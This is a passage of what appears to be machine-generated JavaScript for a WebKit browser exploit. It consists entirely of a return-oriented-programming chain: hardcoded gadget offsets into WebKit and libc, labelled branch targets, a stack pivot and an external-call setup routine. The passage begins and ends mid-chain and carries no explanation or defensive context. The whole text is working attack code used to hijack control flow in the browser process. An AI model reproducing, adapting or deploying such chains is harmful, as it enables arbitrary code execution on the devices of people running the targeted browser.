db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83488, //L438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83504, //L439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L438:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L439:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83664, //L443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+83632, //L441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83648, //L442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L440:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L441:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L442:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+83720, //L445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L445:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83848, //L447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83864, //L448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83832, //L446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L446:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L447:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L448:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83960, //L450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83944, //L449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L450:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84040, //L451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L451:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L453:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+84160, //L456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84144, //L454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L454:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L456:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+84304, //L459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84272, //L457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+84288, //L458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L457:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L458:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L459:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+84376, //L461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L461:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84432, //L462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L462:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84512, //L464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L464:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L466:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+84632, //L469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84616, //L467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L467:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L469:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+84808, //L472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+84824, //L473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84776, //L470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+84792, //L471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L470:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L471:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L472:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L473:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+84936, //L474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+84968, //L476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+84952, //L475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L474:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+85056, //L478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L478:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+85112, //L479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L479:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+85184, //L482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+85240, //L483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L483:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L485:
libc_base+764760, //pop rsi
ropchain+85328, //L486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L486:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L488:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+85448, //L491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+85432, //L489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L491:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+85624, //L494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+85640, //L495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+85592, //L492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+85608, //L493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L492:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L493:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L494:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L495:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+85736, //L497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+85720, //L496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L496:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L497:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+85824, //L499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L498:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L499:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+85880, //L500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L500:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L502:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+85960, //L504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+74104, //L202
//L235:
libc_base+764760, //pop rsi
ropchain+86056, //L505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L505:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L507:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+86176, //L510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+86160, //L508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L510:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+86288, //L511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86320, //L513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+86304, //L512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L511:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L512:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L513:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86424, //L514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86440, //L515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L514:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L515:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86560, //L516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86544, //L517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L517:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L516:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+86648, //L519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+86632, //L518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L518:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86752, //L520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86768, //L521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L520:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86888, //L522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86872, //L523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L523:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L522:
db([0, 0]); // 0x0
//_create_extcall:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86960, //L525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L525:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87024, //L527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L527:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L528:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L530:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+87192, //L533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87176, //L531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L531:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L533:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+87280, //L534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87296, //L536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L534:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L536:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L537:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L539:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+87456, //L542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87440, //L540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+87600, //L545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87568, //L543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87584, //L544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L543:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L544:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L545:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+87672, //L547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L547:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+87728, //L548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L548:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87824, //L551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L550:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L551:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L552:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+87920, //L553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+87936, //L554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L553:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L554:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+88024, //L556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88080, //L557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L557:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+88184, //L559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L561:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+88304, //L564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+88288, //L562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L562:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L564:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88448, //L567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+88416, //L565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+88432, //L566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L565:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L566:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L567:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+88520, //L569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L569:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+88576, //L570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L570:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+88672, //L573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L572:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L574:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+88768, //L575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+88784, //L576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L576:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+88872, //L578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L578:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88928, //L579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L579:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+89000, //L582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L582:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89056, //L583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L583:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L585:
pivot_addr,
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+89192, //L586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L588:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+89312, //L591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+89296, //L589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L589:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L591:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89456, //L594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+89424, //L592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+89440, //L593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
